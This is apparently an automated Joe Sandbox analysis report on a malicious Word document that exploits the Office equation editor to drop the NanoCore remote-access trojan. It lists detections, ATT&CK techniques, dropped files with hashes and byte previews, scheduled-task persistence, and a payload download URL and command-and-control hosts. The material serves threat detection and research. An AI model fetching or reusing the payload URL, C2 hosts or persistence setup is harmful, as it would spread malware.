        Source: Yara matchFile source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
        Source: Yara matchFile source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsExploitation for Client Execution13Scheduled Task/Job1Process Injection112Disable or Modify Tools1Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsScheduled Task/Job1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSVirtualization/Sandbox Evasion13Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol112Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 345151 Sample: Statement.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 63 Multi AV Scanner detection for domain / URL 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 14 other signatures 2->69 8 EQNEDT32.EXE 1 2->8         started        13 taskeng.exe 1 2->13         started        15 WINWORD.EXE 336 19 2->15         started        17 EQNEDT32.EXE 2->17         started        process3 dnsIp4 59 manojvashanava234.sytes.net 84.38.135.158, 49165, 80 DATACLUBLV Latvia 8->59 51 C:\Users\user\AppData\Roaming\JNM.exe, PE32 8->51 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->81 19 JNM.exe 1 8->19         started        22 smtpsvc.exe 1 13->22         started        24 JNM.exe 1 13->24         started        file5 signatures6 process7 signatures8 71 Multi AV Scanner detection for dropped file 19->71 73 Machine Learning detection for dropped file 19->73 75 Hides threads from debuggers 19->75 77 Contains functionality to hide a thread from the debugger 19->77 26 JNM.exe 1 9 19->26         started        31 cmd.exe 19->31         started        79 Injects a PE file into a foreign processes 22->79 33 cmd.exe 22->33         started        35 smtpsvc.exe 22->35         started        37 cmd.exe 24->37         started        39 JNM.exe 24->39         started        process9 dnsIp10 61 dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu 46.243.219.32, 2420 FISHNET-ASRU Netherlands 26->61 53 C:\Program Files (x86)\...\smtpsvc.exe, PE32 26->53 dropped 55 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 26->55 dropped 57 C:\Users\user\AppData\Local\...\tmp6D54.tmp, XML 26->57 dropped 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->83 41 schtasks.exe 26->41         started        43 schtasks.exe 26->43         started        45 timeout.exe 31->45         started        47 timeout.exe 33->47         started        49 timeout.exe 37->49         started        file11 signatures12 process13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Statement.doc45%VirustotalBrowse
        Statement.doc59%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\JNM.exe100%Joe Sandbox ML
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe35%ReversingLabsByteCode-MSIL.Trojan.Generic
        C:\Users\user\AppData\Roaming\JNM.exe35%ReversingLabsByteCode-MSIL.Trojan.Generic

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        26.2.smtpsvc.exe.400000.1.unpack100%AviraHEUR/AGEN.1108376Download File
        7.2.JNM.exe.630000.3.unpack100%AviraTR/NanoCore.fadteDownload File
        7.2.JNM.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File
        23.2.JNM.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File

        Domains

        SourceDetectionScannerLabelLink
        manojvashanava234.sytes.net11%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://manojvashanava234.sytes.net/WAH.exe10%VirustotalBrowse
        http://manojvashanava234.sytes.net/WAH.exe0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu
        46.243.219.32
        truetrue
          unknown
          manojvashanava234.sytes.net
          84.38.135.158
          truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://manojvashanava234.sytes.net/WAH.exetrue
          • 10%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.%s.comPAJNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmpfalse
            high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            84.38.135.158
            unknownLatvia
            52048DATACLUBLVtrue
            46.243.219.32
            unknownNetherlands
            43317FISHNET-ASRUtrue

            General Information

            Joe Sandbox Version:31.0.0 Emerald
            Analysis ID:345151
            Start date:27.01.2021
            Start time:19:11:33
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 12m 12s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:Statement.doc
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:28
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.expl.evad.winDOC@32/13@16/2
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 94%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .doc
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
            • TCP Packets have been reduced to 100
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            19:12:40API Interceptor235x Sleep call for process: EQNEDT32.EXE modified
            19:12:42API Interceptor1881x Sleep call for process: JNM.exe modified
            19:12:49Task SchedulerRun new task: SMTP Service path: "C:\Users\user\AppData\Roaming\JNM.exe" s>$(Arg0)
            19:12:49API Interceptor2x Sleep call for process: schtasks.exe modified
            19:12:49AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            19:12:50API Interceptor427x Sleep call for process: taskeng.exe modified
            19:12:51Task SchedulerRun new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
            19:12:52API Interceptor218x Sleep call for process: smtpsvc.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            84.38.135.158Quote Requirement.docGet hashmaliciousBrowse
            • manojvashanava234.sytes.net/OSE.exe
            New order.docGet hashmaliciousBrowse
            • manojvashanava234.sytes.net/CIC.exe
            Quote Requirement.docGet hashmaliciousBrowse
            • manojvashanava234.sytes.net/OSE.exe
            PMTI000021.docGet hashmaliciousBrowse
            • manojvashanava234.sytes.net/OSE.exe

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            manojvashanava234.sytes.netQuote Requirement.docGet hashmaliciousBrowse
            • 84.38.135.158
            New order.docGet hashmaliciousBrowse
            • 84.38.135.158
            Quote Requirement.docGet hashmaliciousBrowse
            • 84.38.135.158
            PMTI000021.docGet hashmaliciousBrowse
            • 84.38.135.158

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            DATACLUBLVQuote Requirement.docGet hashmaliciousBrowse
            • 84.38.135.158
            New order.docGet hashmaliciousBrowse
            • 84.38.135.158
            Quote Requirement.docGet hashmaliciousBrowse
            • 84.38.135.158
            PMTI000021.docGet hashmaliciousBrowse
            • 84.38.135.158
            PO 10834.exeGet hashmaliciousBrowse
            • 46.183.220.113
            https://gfifaxmakeronline.cmail19.com/t/t-l-xhjmc-glrjkydlk-r/Get hashmaliciousBrowse
            • 109.248.150.119
            qWuT75h3FNx6Mbp.exeGet hashmaliciousBrowse
            • 46.183.218.199
            New Sales.exeGet hashmaliciousBrowse
            • 84.38.134.123
            Kabg6OuIx3R.exeGet hashmaliciousBrowse
            • 84.38.134.114
            http://46.183.222.25/LVS7Kabg6OuIx3R.exeGet hashmaliciousBrowse
            • 46.183.222.25
            DIL-Statement Overdues & Listed Invoice-August 2020.exeGet hashmaliciousBrowse
            • 84.38.135.151
            Scan_17-08-2020 AFSLC INV#0002932.exeGet hashmaliciousBrowse
            • 84.38.135.151
            New_ Order0608202023838494575859445.exeGet hashmaliciousBrowse
            • 84.38.130.164
            ORDER.exeGet hashmaliciousBrowse
            • 84.38.130.164
            Scan_Docs #INV 300489739-04-08-2020 Amended.exeGet hashmaliciousBrowse
            • 84.38.135.151
            o3vcAB1r3E.exeGet hashmaliciousBrowse
            • 46.183.222.16
            Scan_SOA Updated June 2020--06-29-reconciled_.exeGet hashmaliciousBrowse
            • 84.38.135.151
            1.12.2018.jsGet hashmaliciousBrowse
            • 46.183.218.82
            invoice-00976.pdfGet hashmaliciousBrowse
            • 46.183.222.166
            46MON.exeGet hashmaliciousBrowse
            • 46.183.220.71

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1973760
            Entropy (8bit):2.849298578285801
            Encrypted:false
            SSDEEP:1536:FNn93XOcZPdE8u+6zQc/jLsAngk98QjHBxo:z93ecZC8u+68c/7986
            MD5:10D30AD1922421E73E133AD020DF424F
            SHA1:7AB820DC29537EBAADB2D04C2F8B6F246CB8F24A
            SHA-256:79D73D305E1A52C157868E9F0305AE5E6AEBB28E43D360334C118FC1640A5B2C
            SHA-512:72E98B506476EE511D54D0F676FE559C603DD688D5C56B43A124D2D1A712561CD97236CACFE9DC064E416537CA717C2D207F0B4A123CCFA1E966372D8F642A8A
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 35%
            Reputation:low
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9.`............................^8... ...@....@.. .......................`............@..................................8..K............................@....................................................... ............... ..H............text...d.... ...................... ..`.reloc.......@......................@..B........................................................@8......H........R..`............................................................*. ....*.....90...(....9........r`..p....(C...(D...*........(E...*....**....(_...*..0.._.......(....(....(....(....(....(....(....(....(....(....(...............(....(....(...............(....(....(...............(....(....(....(....(~...(}...(|...({...(z...(y...(x...(w...(v...(u...(t...(s...(r...(q...(p...(o...(n..............(m...(l...(k..............(j...(i...(h..............(g...(f...(e..............
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68A17DB9.wmf
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
            Category:dropped
            Size (bytes):180
            Entropy (8bit):2.943359370448092
            Encrypted:false
            SSDEEP:3:2lZlyll6/lollvlgiolog/lLneVOoEXaQNGbV91/l/eXavt/2mcll/l:2lb2oto90ogtqAozQNGbVPQXC1BUl/l
            MD5:3333D3D30CCB3D52656081D7983431F0
            SHA1:5AD6B35F57CEBB82EDC05BEA33C48D9B182B72CE
            SHA-256:58E99AEC6AA8488A9B78EE75D93B1FA64B686DE0006E179DEB084FF862CCBCAB
            SHA-512:6C8F2CF6460E61542D2A8E47A79BA194D5DC847E8E89C7CC143720C11CAB2BCB6E9A132C14A999CD1BA2587CF31ED0C76997564A64F47AA355698D408EE98F90
            Malicious:false
            Preview: .......................................................................... . .....&...................................&.....MathType..P.....&...........................Q...........
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.8712130487472628
            Encrypted:false
            SSDEEP:6:44pwwNgREqAWlgFJpDlll8vlwpbRFwQFrB:vpdk5uFJp7uvqptKQZB
            MD5:F587AA2B21B6793637195CA6AD3AFF62
            SHA1:B28141557E577082F740B9F6EE9E4D1AD51741B3
            SHA-256:B93ABC1DEB43D1FBD06F94A37B28BF2CC4F3AD7A666A9F46BF09304E440107A1
            SHA-512:CF2CC9197CD6518C8498118597BC3400A04E00CD03702E799D01E829039603B7EF077B6AA40D2F6A3FD5FC4240D2B7ED3C7E4B9E77FB1CCF1EE8C535954831DE
            Malicious:false
            Preview: a.n.s.i.6.4.5.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j.9.c...CJ..OJ..QJ..U..^J..aJ.
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55454834-8E09-401E-A760-1A1C7B299BE3}.tmp
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\tmp5A32.tmp
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1310
            Entropy (8bit):5.1063907901076036
            Encrypted:false
            SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
            MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
            SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
            SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
            SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
            Malicious:false
            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
            C:\Users\user\AppData\Local\Temp\tmp6D54.tmp
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1301
            Entropy (8bit):5.105807939032916
            Encrypted:false
            SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK01xtn:cbk4oL600QydbQxIYODOLedq3Mj
            MD5:E2E1F2413B11C7C1D1A56333B80F7094
            SHA1:34C94BE675B0741BFC81E19599597F6C54C3DF2B
            SHA-256:EE1E3555090011DA7680ED21F6428CDC078D5808C1E702C9375F3771C247093A
            SHA-512:473462E626DEAF58E8A94D27A0B78634F6358CE842F6946A5C34831CCB976BB2681643C674F4413AC86F4A57B5B988750AFEB0C8D5620BCBDB938A769565840D
            Malicious:true
            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
            C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:Non-ISO extended-ASCII text, with no line terminators
            Category:dropped
            Size (bytes):8
            Entropy (8bit):3.0
            Encrypted:false
            SSDEEP:3:m9tn:m9t
            MD5:0039F8C444DA3D4473B68D9BCBE67956
            SHA1:DFADD58D8BCC00441089D7E50B6680F6ADE59708
            SHA-256:E4E991B189A88F18F21C4BBF6E70AC805CAE23C195822E68124F7E412945E635
            SHA-512:D81B1BC62638CE8029BB589A4AA977A598DAA2D6CE014AF10EF58D85076BE63D4E5F094EE4B1E473DBBB3E1C9EF8861FD90BC1877884715026BF37BC1B6CFB82
            Malicious:true
            Preview: .8.:..H
            C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):38
            Entropy (8bit):4.461761645524449
            Encrypted:false
            SSDEEP:3:oNXp4EaKC5z9A:oNPaZ5W
            MD5:8631085785FF73C31973E2E860CF2323
            SHA1:90270C28AA4C410258DD47311574F316DBCC846C
            SHA-256:3F07927E5440E7853B9BE8E6EC4A8183AE09D75FBFF58817750058224B888FD9
            SHA-512:B60AA085CE40A555CF7A3F4FDF37AB3AB916480010499478EE1BD79EC5978E1057FC09A44D92E8BA2B4D660011D0554B3485B66C90536C738AFE2A278ED511DB
            Malicious:false
            Preview: C:\Users\user\AppData\Roaming\JNM.exe
            C:\Users\user\AppData\Roaming\JNM.exe
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1973760
            Entropy (8bit):2.849298578285801
            Encrypted:false
            SSDEEP:1536:FNn93XOcZPdE8u+6zQc/jLsAngk98QjHBxo:z93ecZC8u+68c/7986
            MD5:10D30AD1922421E73E133AD020DF424F
            SHA1:7AB820DC29537EBAADB2D04C2F8B6F246CB8F24A
            SHA-256:79D73D305E1A52C157868E9F0305AE5E6AEBB28E43D360334C118FC1640A5B2C
            SHA-512:72E98B506476EE511D54D0F676FE559C603DD688D5C56B43A124D2D1A712561CD97236CACFE9DC064E416537CA717C2D207F0B4A123CCFA1E966372D8F642A8A
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 35%
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9.`............................^8... ...@....@.. .......................`............@..................................8..K............................@....................................................... ............... ..H............text...d.... ...................... ..`.reloc.......@......................@..B........................................................@8......H........R..`............................................................*. ....*.....90...(....9........r`..p....(C...(D...*........(E...*....**....(_...*..0.._.......(....(....(....(....(....(....(....(....(....(....(...............(....(....(...............(....(....(...............(....(....(....(....(~...(}...(|...({...(z...(y...(x...(w...(v...(u...(t...(s...(r...(q...(p...(o...(n..............(m...(l...(k..............(j...(i...(h..............(g...(f...(e..............
            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Statement.LNK
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jan 28 02:12:38 2021, length=111234, window=hide
            Category:dropped
            Size (bytes):2018
            Entropy (8bit):4.566530606487488
            Encrypted:false
            SSDEEP:48:8x/XT0jFg2KrRf4fQh2x/XT0jFg2KrRf4fQ/:8x/XojFdKlgfQh2x/XojFdKlgfQ/
            MD5:9740F08F03EE9772C514D416300985C8
            SHA1:653862A7796EF8FFFAB1254457FB760B794A131A
            SHA-256:D6A4332A51D8E1FEC91F2C5EEBE478FDC48ACDDB4E0B12E93112AFD691A2949B
            SHA-512:237EBAD846AC6262709CDFBB6D0B3DE59E2B7495A97D2A93EB2076F2C6C817C34A26650E46A4505BFABF785556879F08F780D1FCB7216A784A9DD0AF7A55EF3E
            Malicious:false
            Preview: L..................F.... ...y.j..{..y.j..{.....n#................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.....<R.. .STATEM~1.DOC..H.......Q.y.Q.y*...8.....................S.t.a.t.e.m.e.n.t...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\Statement.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.t.a.t.e.m.e.n.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W...9F.C...........[D_....3N...W...9F.C.......
            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):65
            Entropy (8bit):4.102256182446669
            Encrypted:false
            SSDEEP:3:M12EmpRYuTpRYmX12EmpRYv:MANpRZpReNpRC
            MD5:A225ECA3DB57FCE1A5758E3D1A8724AD
            SHA1:D6EE62F233AC11C74ECEF20EF8C3205C1CFB08C3
            SHA-256:5BDBB39ABB1F4FA53F48A82EA99E73329B590A8D5A4647D1A6CF93FF22E84541
